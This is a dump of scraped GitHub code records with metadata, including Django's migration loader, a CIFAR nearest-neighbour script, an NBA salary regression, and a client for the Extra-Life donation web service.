store=0)\n\t\ttime.sleep(1)","repo_name":"studioalgorhythmics/sensoriumofanimals_github","sub_path":"wifi_sensing/scripts/list_scapy.py","file_name":"list_scapy.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6300322605","text":"import pkgutil\nimport sys\nfrom importlib import import_module, reload\n\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.db.migrations.graph import MigrationGraph\nfrom django.db.migrations.recorder import MigrationRecorder\n\nfrom .exceptions import (\n AmbiguityError,\n BadMigrationError,\n InconsistentMigrationHistory,\n NodeNotFoundError,\n)\n\nMIGRATIONS_MODULE_NAME = \"migrations\"\n\n\nclass MigrationLoader:\n \"\"\"\n Load migration files from disk and their status from the database.\n\n Migration files are expected to live in the \"migrations\" directory of\n an app. Their names are entirely unimportant from a code perspective,\n but will probably follow the 1234_name.py convention.\n\n On initialization, this class will scan those directories, and open and\n read the Python files, looking for a class called Migration, which should\n inherit from django.db.migrations.Migration. See\n django.db.migrations.migration for what that looks like.\n\n Some migrations will be marked as \"replacing\" another set of migrations.\n These are loaded into a separate set of migrations away from the main ones.\n If all the migrations they replace are either unapplied or missing from\n disk, then they are injected into the main set, replacing the named migrations.\n Any dependency pointers to the replaced migrations are re-pointed to the\n new migration.\n\n This does mean that this class MUST also talk to the database as well as\n to disk, but this is probably fine. We're already not just operating\n in memory.\n \"\"\"\n\n def __init__(\n self,\n connection,\n load=True,\n ignore_no_migrations=False,\n replace_migrations=True,\n ):\n self.connection = connection\n self.disk_migrations = None\n self.applied_migrations = None\n self.ignore_no_migrations = ignore_no_migrations\n self.replace_migrations = replace_migrations\n if load:\n self.build_graph()\n\n @classmethod\n def migrations_module(cls, app_label):\n \"\"\"\n Return the path to the migrations module for the specified app_label\n and a boolean indicating if the module is specified in\n settings.MIGRATION_MODULE.\n \"\"\"\n if app_label in settings.MIGRATION_MODULES:\n return settings.MIGRATION_MODULES[app_label], True\n else:\n app_package_name = apps.get_app_config(app_label).name\n return \"%s.%s\" % (app_package_name, MIGRATIONS_MODULE_NAME), False\n\n def load_disk(self):\n \"\"\"Load the migrations from all INSTALLED_APPS from disk.\"\"\"\n self.disk_migrations = {}\n self.unmigrated_apps = set()\n self.migrated_apps = set()\n for app_config in apps.get_app_configs():\n # Get the migrations module directory\n module_name, explicit = self.migrations_module(app_config.label)\n if module_name is None:\n self.unmigrated_apps.add(app_config.label)\n continue\n was_loaded = module_name in sys.modules\n try:\n module = import_module(module_name)\n except ModuleNotFoundError as e:\n if (explicit and self.ignore_no_migrations) or (\n not explicit and MIGRATIONS_MODULE_NAME in e.name.split(\".\")\n ):\n self.unmigrated_apps.add(app_config.label)\n continue\n raise\n else:\n # Module is not a package (e.g. migrations.py).\n if not hasattr(module, \"__path__\"):\n self.unmigrated_apps.add(app_config.label)\n continue\n # Empty directories are namespaces. Namespace packages have no\n # __file__ and don't use a list for __path__. See\n # https://docs.python.org/3/reference/import.html#namespace-packages\n if getattr(module, \"__file__\", None) is None and not isinstance(\n module.__path__, list\n ):\n self.unmigrated_apps.add(app_config.label)\n continue\n # Force a reload if it's already loaded (tests need this)\n if was_loaded:\n reload(module)\n self.migrated_apps.add(app_config.label)\n migration_names = {\n name\n for _, name, is_pkg in pkgutil.iter_modules(module.__path__)\n if not is_pkg and name[0] not in \"_~\"\n }\n # Load migrations\n for migration_name in migration_names:\n migration_path = \"%s.%s\" % (module_name, migration_name)\n try:\n migration_module = import_module(migration_path)\n except ImportError as e:\n if \"bad magic number\" in str(e):\n raise ImportError(\n \"Couldn't import %r as it appears to be a stale \"\n \".pyc file.\" % migration_path\n ) from e\n else:\n raise\n if not hasattr(migration_module, \"Migration\"):\n raise BadMigrationError(\n \"Migration %s in app %s has no Migration class\"\n % (migration_name, app_config.label)\n )\n self.disk_migrations[\n app_config.label, migration_name\n ] = migration_module.Migration(\n migration_name,\n app_config.label,\n )\n\n def get_migration(self, app_label, name_prefix):\n \"\"\"Return the named migration or raise NodeNotFoundError.\"\"\"\n return self.graph.nodes[app_label, name_prefix]\n\n def get_migration_by_prefix(self, app_label, name_prefix):\n \"\"\"\n Return the migration(s) which match the given app label and name_prefix.\n \"\"\"\n # Do the search\n results = []\n for migration_app_label, migration_name in self.disk_migrations:\n if migration_app_label == app_label and migration_name.startswith(\n name_prefix\n ):\n results.append((migration_app_label, migration_name))\n if len(results) > 1:\n raise AmbiguityError(\n \"There is more than one migration for '%s' with the prefix '%s'\"\n % (app_label, name_prefix)\n )\n elif not results:\n raise KeyError(\n f\"There is no migration for '{app_label}' with the prefix \"\n f\"'{name_prefix}'\"\n )\n else:\n return self.disk_migrations[results[0]]\n\n def check_key(self, key, current_app):\n if (key[1] != \"__first__\" and key[1] != \"__latest__\") or key in self.graph:\n return key\n # Special-case __first__, which means \"the first migration\" for\n # migrated apps, and is ignored for unmigrated apps. It allows\n # makemigrations to declare dependencies on apps before they even have\n # migrations.\n if key[0] == current_app:\n # Ignore __first__ references to the same app (#22325)\n return\n if key[0] in self.unmigrated_apps:\n # This app isn't migrated, but something depends on it.\n # The models will get auto-added into the state, though\n # so we're fine.\n return\n if key[0] in self.migrated_apps:\n try:\n if key[1] == \"__first__\":\n return self.graph.root_nodes(key[0])[0]\n else: # \"__latest__\"\n return self.graph.leaf_nodes(key[0])[0]\n except IndexError:\n if self.ignore_no_migrations:\n return None\n else:\n raise ValueError(\n \"Dependency on app with no migrations: %s\" % key[0]\n )\n raise ValueError(\"Dependency on unknown app: %s\" % key[0])\n\n def add_internal_dependencies(self, key, migration):\n \"\"\"\n Internal dependencies need to be added first to ensure `__first__`\n dependencies find the correct root node.\n \"\"\"\n for parent in migration.dependencies:\n # Ignore __first__ references to the same app.\n if parent[0] == key[0] and parent[1] != \"__first__\":\n self.graph.add_dependency(migration, key, parent, skip_validation=True)\n\n def add_external_dependencies(self, key, migration):\n for parent in migration.dependencies:\n # Skip internal dependencies\n if key[0] == parent[0]:\n continue\n parent = self.check_key(parent, key[0])\n if parent is not None:\n self.graph.add_dependency(migration, key, parent, skip_validation=True)\n for child in migration.run_before:\n child = self.check_key(child, key[0])\n if child is not None:\n self.graph.add_dependency(migration, child, key, skip_validation=True)\n\n def build_graph(self):\n \"\"\"\n Build a migration dependency graph using both the disk and database.\n You'll need to rebuild the graph if you apply migrations. This isn't\n usually a problem as generally migration stuff runs in a one-shot process.\n \"\"\"\n # Load disk data\n self.load_disk()\n # Load database data\n if self.connection is None:\n self.applied_migrations = {}\n else:\n recorder = MigrationRecorder(self.connection)\n self.applied_migrations = recorder.applied_migrations()\n # To start, populate the migration graph with nodes for ALL migrations\n # and their dependencies. Also make note of replacing migrations at this step.\n self.graph = MigrationGraph()\n self.replacements = {}\n for key, migration in self.disk_migrations.items():\n self.graph.add_node(key, migration)\n # Replacing migrations.\n if migration.replaces:\n self.replacements[key] = migration\n for key, migration in self.disk_migrations.items():\n # Internal (same app) dependencies.\n self.add_internal_dependencies(key, migration)\n # Add external dependencies now that the internal ones have been resolved.\n for key, migration in self.disk_migrations.items():\n self.add_external_dependencies(key, migration)\n # Carry out replacements where possible and if enabled.\n if self.replace_migrations:\n for key, migration in self.replacements.items():\n # Get applied status of each of this migration's replacement\n # targets.\n applied_statuses = [\n (target in self.applied_migrations) for target in migration.replaces\n ]\n # The replacing migration is only marked as applied if all of\n # its replacement targets are.\n if all(applied_statuses):\n self.applied_migrations[key] = migration\n else:\n self.applied_migrations.pop(key, None)\n # A replacing migration can be used if either all or none of\n # its replacement targets have been applied.\n if all(applied_statuses) or (not any(applied_statuses)):\n self.graph.remove_replaced_nodes(key, migration.replaces)\n else:\n # This replacing migration cannot be used because it is\n # partially applied. Remove it from the graph and remap\n # dependencies to it (#25945).\n self.graph.remove_replacement_node(key, migration.replaces)\n # Ensure the graph is consistent.\n try:\n self.graph.validate_consistency()\n except NodeNotFoundError as exc:\n # Check if the missing node could have been replaced by any squash\n # migration but wasn't because the squash migration was partially\n # applied before. In that case raise a more understandable exception\n # (#23556).\n # Get reverse replacements.\n reverse_replacements = {}\n for key, migration in self.replacements.items():\n for replaced in migration.replaces:\n reverse_replacements.setdefault(replaced, set()).add(key)\n # Try to reraise exception with more detail.\n if exc.node in reverse_replacements:\n candidates = reverse_replacements.get(exc.node, set())\n is_replaced = any(\n candidate in self.graph.nodes for candidate in candidates\n )\n if not is_replaced:\n tries = \", \".join(\"%s.%s\" % c for c in candidates)\n raise NodeNotFoundError(\n \"Migration {0} depends on nonexistent node ('{1}', '{2}'). \"\n \"Django tried to replace migration {1}.{2} with any of [{3}] \"\n \"but wasn't able to because some of the replaced migrations \"\n \"are already applied.\".format(\n exc.origin, exc.node[0], exc.node[1], tries\n ),\n exc.node,\n ) from exc\n raise\n self.graph.ensure_not_cyclic()\n\n def check_consistent_history(self, connection):\n \"\"\"\n Raise InconsistentMigrationHistory if any applied migrations have\n unapplied dependencies.\n \"\"\"\n recorder = MigrationRecorder(connection)\n applied = recorder.applied_migrations()\n for migration in applied:\n # If the migration is unknown, skip it.\n if migration not in self.graph.nodes:\n continue\n for parent in self.graph.node_map[migration].parents:\n if parent not in applied:\n # Skip unapplied squashed migrations that have all of their\n # `replaces` applied.\n if parent in self.replacements:\n if all(\n m in applied for m in self.replacements[parent].replaces\n ):\n continue\n raise InconsistentMigrationHistory(\n \"Migration {}.{} is applied before its dependency \"\n \"{}.{} on database '{}'.\".format(\n migration[0],\n migration[1],\n parent[0],\n parent[1],\n connection.alias,\n )\n )\n\n def detect_conflicts(self):\n \"\"\"\n Look through the loaded graph and detect any conflicts - apps\n with more than one leaf migration. Return a dict of the app labels\n that conflict with the migration names that conflict.\n \"\"\"\n seen_apps = {}\n conflicting_apps = set()\n for app_label, migration_name in self.graph.leaf_nodes():\n if app_label in seen_apps:\n conflicting_apps.add(app_label)\n seen_apps.setdefault(app_label, set()).add(migration_name)\n return {\n app_label: sorted(seen_apps[app_label]) for app_label in conflicting_apps\n }\n\n def project_state(self, nodes=None, at_end=True):\n \"\"\"\n Return a ProjectState object representing the most recent state\n that the loaded migrations represent.\n\n See graph.make_state() for the meaning of \"nodes\" and \"at_end\".\n \"\"\"\n return self.graph.make_state(\n nodes=nodes, at_end=at_end, real_apps=self.unmigrated_apps\n )\n\n def collect_sql(self, plan):\n \"\"\"\n Take a migration plan and return a list of collected SQL statements\n that represent the best-efforts version of that plan.\n \"\"\"\n statements = []\n state = None\n for migration, backwards in plan:\n with self.connection.schema_editor(\n collect_sql=True, atomic=migration.atomic\n ) as schema_editor:\n if state is None:\n state = self.project_state(\n (migration.app_label, migration.name), at_end=False\n )\n if not backwards:\n state = migration.apply(state, schema_editor, collect_sql=True)\n else:\n state = migration.unapply(state, schema_editor, collect_sql=True)\n statements.extend(schema_editor.collected_sql)\n return statements\n","repo_name":"django/django","sub_path":"django/db/migrations/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":16863,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"10505774302","text":"import numpy as np\nimport pickle, sys\n\ndef load_CIFAR_batch(filename):\n \"\"\" load single batch of cifar \"\"\"\n with open(filename, 'rb') as f:\n datadict = pickle.load(f,encoding='bytes')\n X = datadict['data']\n Y = datadict['labels']\n X = X.reshape(10000, 3, 32, 32).transpose(0, 2, 3, 1).astype(\"float\")\n Y = np.array(Y)\n return X, Y\n\n\ndef load_CIFAR10(ROOT):\n \"\"\" load all of cifar \"\"\"\n xs = []\n ys = []\n for b in range(1, 6):\n # f = os.path.join(ROOT, 'data_batch_%d' % (b,))\n f = ROOT+'data_batch_'+str(b)\n X, Y = load_CIFAR_batch(f)\n xs.append(X)\n ys.append(Y)\n Xtr = np.concatenate(xs)\n Ytr = np.concatenate(ys)\n del X, Y\n Xte, Yte = load_CIFAR_batch(filename=(ROOT+'test_batch'))\n return Xtr, Ytr, Xte, Yte\n\n\nclass NearestNeighbor(object):\n def __init__(self):\n pass\n\n def train(self, X, y):\n \"\"\" X is N x D where each row is an example. Y is 1-dimension of size N \"\"\"\n # the nearest neighbor classifier simply remembers all the training data\n self.Xtr = X\n self.ytr = y\n\n def predict(self, X):\n \"\"\" X is N x D where each row is an example we wish to predict label for \"\"\"\n num_test = X.shape[0]\n # lets make sure that the output type matches the input type\n Ypred = np.zeros(num_test, dtype=self.ytr.dtype)\n\n # loop over all test rows\n for i in range(num_test):\n # find the nearest training image to the i'th test image\n # using the L1 distance (sum of absolute value differences)\n distances = np.sum(np.abs(self.Xtr - X[i, :]), axis=1)\n min_index = np.argmin(distances) # get the index with smallest distance\n Ypred[i] = self.ytr[min_index] # predict the label of the nearest example\n\n return Ypred\n\n\nif __name__ == '__main__':\n Xtr, Ytr, Xte, Yte = load_CIFAR10(ROOT= '../assignment1/cs231n/datasets/cifar10/') # a magic function we provide\n # flatten out all images to be one-dimensional\n Xtr_rows = Xtr.reshape(Xtr.shape[0], 32 * 32 * 3) # Xtr_rows becomes 50000 x 3072\n Xte_rows = Xte.reshape(Xte.shape[0], 32 * 32 * 3) # Xte_rows becomes 10000 x 3072\n","repo_name":"aishik-pyne/Udacity","sub_path":"CS231n/Lecture1/NearestNeighbour.py","file_name":"NearestNeighbour.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12542873641","text":"import streamlit as st\nimport pandas as pd\nst.title('My First app')\nst.header('lol')\nst.write(\"\"\" Bienvenidos a mi pagina\"\"\")\n\nnames_link = 'dataset.csv'\nnames_data = pd.read_csv(names_link)\nst.title('Read.csv')\n\nst.dataframe(names_data)","repo_name":"C4RLO5lg/C4RLO5lg.github.io","sub_path":"stramlit.py","file_name":"stramlit.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36470714158","text":"import os\nimport json\nimport random\nimport numpy as np\nfrom typing import List, Dict\n\nclass Project(object):\n '''Benchmark Project Object.\n\n Due to different implementation of the benchmarking framework, we need to specialize\n methods for different languages to process the data.\n '''\n\n def __init__(self, path: str, name : str):\n super(Project, self).__init__()\n self.path = path\n self.name = name\n self.table : Dict = {}\n self._data = None\n\n @staticmethod\n def random_color():\n '''random color in RGB format.\n '''\n return (random.random(), random.random(), random.random())\n\n def data_file(self):\n data_file_list = []\n # find any file end with data.json and put it into this list\n for (root, dirs, files) in os.walk(os.path.join(self.path, 'data')):\n for file in files:\n if file.endswith('data.json'):\n data_file_list.append(os.path.join(root, file))\n return data_file_list\n\n def read_data(self):\n last = self.data_file()[-1]\n with open(last) as f:\n data = json.load(f)\n\n return data\n\n @property\n def data(self):\n if self._data is None:\n self._data = self.read_data()\n\n return self._data\n\n def get_label(self, data, label : str):\n raise NotImplementedError\n\n def get_min_time(self, entry):\n raise NotImplementedError\n\n def get_nqubits(self, entry):\n raise NotImplementedError\n\n def labels(self, data):\n raise NotImplementedError\n\n def update_table(self, labels : List[str]):\n for label in labels:\n label_data = self.get_label(self.data, label)\n if label_data:\n min_times = [self.get_min_time(each) for each in label_data]\n nqubits = [self.get_nqubits(each) for each in label_data]\n indices = sorted(range(len(nqubits)), key=lambda k : nqubits[k])\n min_times = [min_times[k] for k in indices]\n nqubits = [nqubits[k] for k in indices]\n self.table[label] = {\"nqubits\": nqubits, \"times\": min_times}\n\n\n def absolute(self, plots : List, colors = None):\n for each in plots:\n for label in each.labels:\n if label in self.table:\n d = self.table[label]\n if colors is None:\n color = self.random_color()\n else:\n color = colors[label]\n\n line = each.ax.semilogy(d[\"nqubits\"], d[\"times\"], '-o', markersize=4, color=color)\n each.add_line(self, line)\n\n\n def relative(self, project, plots : List, colors = None):\n for each in plots:\n for label in each.labels:\n if label in self.table:\n d = self.table[label]\n if colors is None:\n color = self.random_color()\n else:\n color = colors[label]\n\n\n line = each.ax.semilogy(d[\"nqubits\"],\n np.array(d['times'])/np.array(project.table[label]['times']), '-o', markersize=4, color=color)\n each.add_line(self, line)\n\n\nclass PythonProject(Project):\n\n def __init__(self, path : str, name : str = None):\n if name is None:\n name = os.path.basename(path)\n\n super(PythonProject, self).__init__(path, name)\n\n\n def labels(self, data = None):\n if data is None:\n data = self.read_data()\n return set([each['group'] for each in data['benchmarks']])\n\n def get_label(self, data, label : str):\n return [each for each in data['benchmarks'] if each['group'] == label]\n\n def get_min_time(self, entry):\n return entry['stats']['min'] * 1e9 # convert to ns\n\n def get_nqubits(self, entry):\n return entry['params']['nqubits']\n\nclass JuliaProject(Project):\n\n def __init__(self, path : str, name : str = None):\n name = os.path.basename(path)\n name = name.capitalize()\n super(JuliaProject, self).__init__(path, name)\n\n def get_label(self, data, label : str):\n return data[label]\n\n def get_min_time(self, entry):\n return entry['times']\n\n def get_nqubits(self, entry):\n return entry['nqubits']\n\n def update_table(self, labels):\n for l in labels:\n self.table[l] = self.data[l]\n\n\n\nclass Plot:\n\n def __init__(self, ax, title, labels = None, lines = None):\n self.ax = ax\n self.title = title\n\n if labels is None:\n self.labels = []\n else:\n self.labels = labels\n\n if lines is None:\n self._lines = {}\n else:\n self._lines = lines\n\n def add_line(self, project : Project, line):\n if project in self._lines:\n self._lines[project].append(line)\n else:\n self._lines[project] = [line]\n\n def getlines(self, project : Project = None):\n if project is None:\n lines = []\n for ls in self._lines.values():\n lines.append(ls)\n\n return lines\n\n else:\n return self._lines[project]\n\n @property\n def lines(self):\n return self.getlines()\n","repo_name":"yardstiq/quantum-benchmarks","sub_path":"bin/utils/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"37"} +{"seq_id":"35675622856","text":"#job scheduling prob:\r\n#https://www.youtube.com/watch?v=cr6Ip0J9izc&index=12&list=PLrmLmBdmIlpsHaNTPP_jHHDx_os9ItYXr\r\n\r\ndef jobScheduling(list1):\r\n solList=[]\r\n for item in list1:\r\n solList.append(item[1])\r\n \r\n for i in range(len(list1)):\r\n for j in range(0,i):\r\n #print(list1[i][0][0] , \"list1[j][1] : \", list1[j][0][1])\r\n if list1[i][0][0] >= list1[j][0][1]:#job dont overlaps\r\n solList[i] = max(solList[i] ,list1[i][1] + solList[j])\r\n \r\n \r\n print(solList) \r\n return max(solList)\r\n \r\n \r\n \r\nlist1=[[[1,3],5],\r\n [[2,5],6],\r\n [[4,6],5],\r\n [[6,7],4],\r\n [[5,8],11],\r\n [[7,9],2]\r\n ]\r\n\r\nprint(jobScheduling(list1)) \r\n\r\n\r\n","repo_name":"atulanandnitt/questionsBank","sub_path":"dp/@jobScheduling.py","file_name":"@jobScheduling.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32163314067","text":"import numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport seaborn as sns\n\nbasket = pd.read_csv('nbastats2018-2019.csv')\n\n'''\nbasket column\n(['Height', 'Weight', 'Age', 'Salary', 'Points', 'Blocks',\n'Steals', 'Assists', 'Rebounds', 'FT%', 'FTA', 'FG3%', 'FG3A', 'FG%',\n'FGA', 'MP', 'G',\n'PER', 'OWS', 'DWS', 'WS', 'WS48', 'USG', 'BPM', 'VORP'],\ndtype='object')\nMP\nMinutes Played\nG\nGames\nPER\nPlayer Efficiency Rating\nOWS\nOffensive Win Shares\nDWS\nDefensive Win Shares\nWS\nWin Shares\nWS48\nWin Shares Per 48 Minutes\nUSG\nUsage Percentage\nBPM\nBox Plus-Minus\nVORP\nValue Over Replacement Player\n'''\n\nbasket = basket.dropna(subset=['Team'])\n\nbasket = basket.drop(['Name','Team','Weight','Height','FT%','FG3%','FG%','FGA','FG3A','FTA','MP','G',\n'PER', 'OWS',\n'DWS', 'WS', 'WS48', 'USG', 'BPM', 'VORP'],axis=1)\n\n#print(basket.dtypes)\n'''\nHeight int64\nWeight int64\nAge int64\nSalary object\nPoints float64\nBlocks float64\nSteals float64\nAssists float64\nRebounds float64\nFT% float64\nFTA float64\nFG3% float64\nFG3A float64\nFG% float64\nFGA float64\nMP float64\nG int64\nPER float64\nOWS float64\nDWS float64\nWS float64\nWS48 float64\nUSG float64\nBPM float64\nVORP float64\ndtype: object\n'''\n\nbasket['Salary'] = basket['Salary'].astype('int64')\n#karena di view sebagai object\n\n#distribution plot\n# plt.figure(figsize=(20,10))\n# plt.subplot(2,3,1)\n# plt.scatter(x='Age',y='Salary',data=basket)\n# plt.xlabel('Age')\n# plt.ylabel('Salary')\n# plt.subplot(2,3,2)\n# plt.title('Salary Distribution Plot')\n# plt.scatter(x='Points',y='Salary',data=basket)\n# plt.xlabel('Points')\n# plt.ylabel('Salary')\n# plt.subplot(2,3,3)\n# plt.scatter(x='Blocks',y='Salary',data=basket)\n# plt.xlabel('Blocks')\n# plt.ylabel('Salary')\n# plt.subplot(2,3,4)\n# plt.scatter(x='Steals',y='Salary',data=basket)\n# plt.xlabel('Steals')\n# plt.ylabel('Salary')\n# plt.subplot(2,3,5)\n# plt.scatter(x='Assists',y='Salary',data=basket)\n# plt.xlabel('Assists')\n# plt.ylabel('Salary')\n# plt.subplot(2,3,6)\n# plt.scatter(x='Rebounds',y='Salary',data=basket)\n# plt.xlabel('Rebounds')\n# plt.ylabel('Salary')\n\n#correlation plot\n# bc = basket.corr()\n# sns.heatmap(bc,annot=True)\n# plt.show()\n\nx = basket.drop(['Salary'],axis=1)\ny = basket['Salary']\n\nfrom sklearn.model_selection import train_test_split\nxtrain,xtest,ytrain,ytest = train_test_split(\n x,\n y,\n test_size = .1,\n random_state = 101\n)\n\n# from sklearn.linear_model import LinearRegression\n# linmodel = LinearRegression()\n# linmodel.fit(xtrain,ytrain)\n\n\nfrom sklearn.ensemble import RandomForestRegressor\nRFFmodel = RandomForestRegressor()\nRFFmodel.fit(xtrain,ytrain)\n\nprint('Random Forest Regressor model score',round((RFFmodel.score(xtrain,ytrain)*100),2),'%')\n\n# print(linmodel.intercept_)\n\n# print(linmodel.coef_)\n# '''\n# [ 627686.61477924 472169.83564527 84568.44051308 2035050.59046354\n# 390478.60074215 655765.3571344 ]\n# '''\n\n# print(xtrain.columns)\n# '''\n# ['Age', 'Points', 'Blocks', 'Steals', 'Assists', 'Rebounds']\n# '''\n\n# basketcoeff = pd.DataFrame(linmodel.coef_,xtrain.columns,columns=['Coeff'])\n\n# print(basketcoeff)\n# '''\n# Coeff\n# Age 6.276866e+05\n# Points 4.721698e+05\n# Blocks 8.456844e+04\n# Steals 2.035051e+06\n# Assists 3.904786e+05\n# Rebounds 6.557654e+05\n# '''\n\n# print(linmodel.predict([[25,20,-2,2,5,10]]))\n\nimport joblib\n# joblib.dump(linmodel,'modeljoblib')\njoblib.dump(RFFmodel,'modeljoblib')","repo_name":"kevinwid2993/FinalProject","sub_path":"mod.py","file_name":"mod.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"14650286957","text":"import requests\n\n\nclass WebServiceException(Exception):\n pass\n\n\ndef team(team_id):\n \"\"\"Convenience method to instantiate a Team\n\n :param team_id: The assigned team ID\n \"\"\"\n try:\n t = Team.from_url(team_id)\n except WebServiceException:\n t = None\n\n return t\n\n\ndef participants(team_id):\n \"\"\"Convenience method to retrieve a Team's participants\n\n :param team_id: The assigned team ID\n \"\"\"\n try:\n p = Team.from_url(team_id).participants()\n except WebServiceException:\n p = None\n\n return p\n\n\ndef participant(participant_id):\n \"\"\"Convenience method to retrieve a Participant\n\n :param participant_id: The assigned participant ID\n \"\"\"\n try:\n p = Participant.from_url(participant_id)\n except WebServiceException:\n p = None\n\n return p\n\n\ndef participant_donations(participant_id):\n \"\"\"Convenience method to retrieve a Participant's donations\n\n :param participant_id: The assigned participant ID\n \"\"\"\n try:\n d = Participant.from_url(participant_id).donations()\n except WebServiceException:\n d = None\n\n return d\n\n\nclass Team(object):\n def __init__(self, team_id, name, raised, goal, avatar_url, created):\n\n # extra-life assigned team ID\n self.team_id = team_id\n\n # the team name provided by the organizer\n self.name = name\n\n # how much money the team has raised thus far\n self.raised = raised\n\n # the fundraising goal the team has, if any\n self.goal = goal\n\n # avatar image URL\n self.avatar_url = avatar_url\n\n # when the team was registered with Extra-Life\n self.created = created\n\n # participant cache - see participants()\n self._participants = None\n\n @classmethod\n def from_url(cls, team_id):\n \"\"\"Constructs an ExtraLifeTeam from the team web service.\n\n :param team_id: the Extra-Life assigned team ID\n \"\"\"\n\n url = (\"http://www.extra-life.org/\"\n \"index.cfm?fuseaction=donorDrive.team&teamID={}&format=json\")\n\n r = requests.get(url.format(team_id))\n if r.status_code != 200:\n raise WebServiceException(\"Could not retrieve Extra-Life team \"\n \"information.\")\n\n data = r.json()\n\n name = data.get(\"name\", \"Extra-Life Team\")\n raised = data.get(\"totalRaisedAmount\", 0.0)\n goal = data.get(\"fundraisingGoal\", 0.0)\n avatar_url = data.get(\"avatarImageURL\", None)\n created = data.get(\"createdOn\", None)\n\n return cls(team_id, name, raised, goal, avatar_url, created)\n\n def participants(self, force=False):\n \"\"\"Returns the list of participants for the team using the\n teamParticipants web service call. This call is cached. To force a\n new service call, use force=True\n\n :param force: Ignore existing participants info. Default False.\n \"\"\"\n if self._participants is not None and not force:\n return self._participants\n\n url = (\"http://www.extra-life.org/index.cfm?\"\n \"fuseaction=donorDrive.teamParticipants&teamID={}&format=json\")\n\n r = requests.get(url.format(self.team_id))\n if r.status_code != 200:\n raise WebServiceException(\"Could not retrieve Extra-Life team \"\n \"participant information.\")\n\n data = r.json()\n self._participants = []\n for pdata in data:\n participant_id = pdata.get(\"participantID\", None)\n created = pdata.get(\"createdOn\", None)\n last_name = pdata.get(\"lastName\", None)\n first_name = pdata.get(\"firstName\", None)\n avatar_url = pdata.get(\"avatarImageURL\", None)\n team_captain = pdata.get(\"isTeamCaptain\", False)\n\n # these fields are not present in the web service\n raised = None\n goal = None\n\n p = Participant(participant_id, self.team_id,\n team_captain, first_name, last_name,\n raised, goal, avatar_url, created)\n self._participants.append(p)\n\n return self._participants\n\n def __repr__(self):\n return \"ExtraLifeTeam\".format(self.team_id)\n\n\nclass Participant(object):\n def __init__(self, participant_id, team_id, is_team_captain, first_name,\n last_name, raised, goal, avatar_url, created):\n\n # extra-life assigned participant ID\n self.participant_id = participant_id\n\n # which team they belong to\n self.team_id = team_id\n\n # is this person a team captain?\n self.is_team_captain = is_team_captain\n\n # participant-entered name data\n self.first_name = first_name\n self.last_name = last_name\n\n # how much money this person has raised\n self.raised = raised\n\n # this person's fundraising goal\n self.goal = goal\n\n # avatar image url\n self.avatar_url = avatar_url\n\n # when this person registered\n self.created = created\n\n # the list of donations this participant has - see donations()\n self._donations = None\n\n @classmethod\n def from_url(cls, participant_id):\n \"\"\"Constructs an Participant from the participant web service.\n \n :param participant_id: The Extra-Life provided participant ID.\n \"\"\"\n url = (\"http://www.extra-life.org/index.cfm?\"\n \"fuseaction=donorDrive.participant&\"\n \"participantID={}&format=json\")\n\n r = requests.get(url.format(participant_id))\n\n if r.status_code != 200:\n raise WebServiceException(\"Could not retrieve Extra-Life \"\n \"participant information.\")\n\n data = r.json()\n\n team_id = data.get(\"teamID\", None)\n is_team_captain = data.get(\"isTeamCaptain\", False)\n first_name = data.get(\"firstName\", \"John\")\n last_name = data.get(\"lastName\", \"Doe\")\n raised = data.get(\"totalRaisedAmount\", 0.0)\n goal = data.get(\"fundraisingGoal\", 0.0)\n avatar_url = data.get(\"avatarImageURL\", None)\n created = data.get(\"createdOn\", None)\n\n participant = cls(participant_id, team_id, is_team_captain, first_name,\n last_name, raised, goal, avatar_url, created)\n\n return participant\n\n def donations(self, force=False):\n \"\"\"Returns the list of donations for the participant using the\n participantDonations web service call. This call is cached. To force a\n new service call, use force=True\n\n :param force: Ignore existing donations info. Default False.\n \"\"\"\n\n if self._donations is not None and not force:\n return self._donations\n\n url = (\"http://www.extra-life.org/index.cfm?\"\n \"fuseaction=donorDrive.participantDonations&\"\n \"participantID={}&\"\n \"format=json\")\n\n r = requests.get(url.format(self.participant_id))\n\n if r.status_code != 200:\n raise WebServiceException(\"Could not retrieve Extra-Life participant \"\n \"donation information.\")\n\n data = r.json()\n\n self._donations = []\n for d in data:\n donor = d.get(\"donorName\", None)\n amount = d.get(\"donationAmount\", None)\n message = d.get(\"message\", None)\n avatar_url = d.get(\"avatarImageURL\", None)\n created = d.get(\"created\", None)\n\n donation = Donation(self.participant_id, donor, amount,\n message, avatar_url, created)\n\n self._donations.append(donation)\n\n return self._donations\n\n def __repr__(self):\n return \"Participant\".format(self.participant_id)\n\n\nclass Donation(object):\n def __init__(self, participant_id, donor, amount, message, avatar_url,\n created):\n # the owning participant for this donation\n self.participant_id = participant_id\n\n # who donated the $$$\n self.donor = donor\n\n # the amount of the donation\n self.amount = amount\n\n # personalized message from the donor to the participant\n self.message = message\n\n # if the donor was also an ExtraLife participant, they have an avatar\n self.avatar_url = avatar_url\n\n # when the donor gave the money (?)\n self.created = created\n\n def __repr__(self):\n return \"Donation\".format(self.participant_id)\n","repo_name":"fragforce/donation-api","sub_path":"extralife.py","file_name":"extralife.py","file_ext":"py","file_size_in_byte":8595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45127293027","text":"\"\"\"\r\nquestion:\r\n给你一个链表,每 k 个节点一组进行翻转,请你返回翻转后的链表。\r\nk 是一个正整数,它的值小于或等于链表的长度。\r\n如果节点总数不是 k 的整数倍,那么请将最后剩余的节点保持原有顺序。\r\n说明 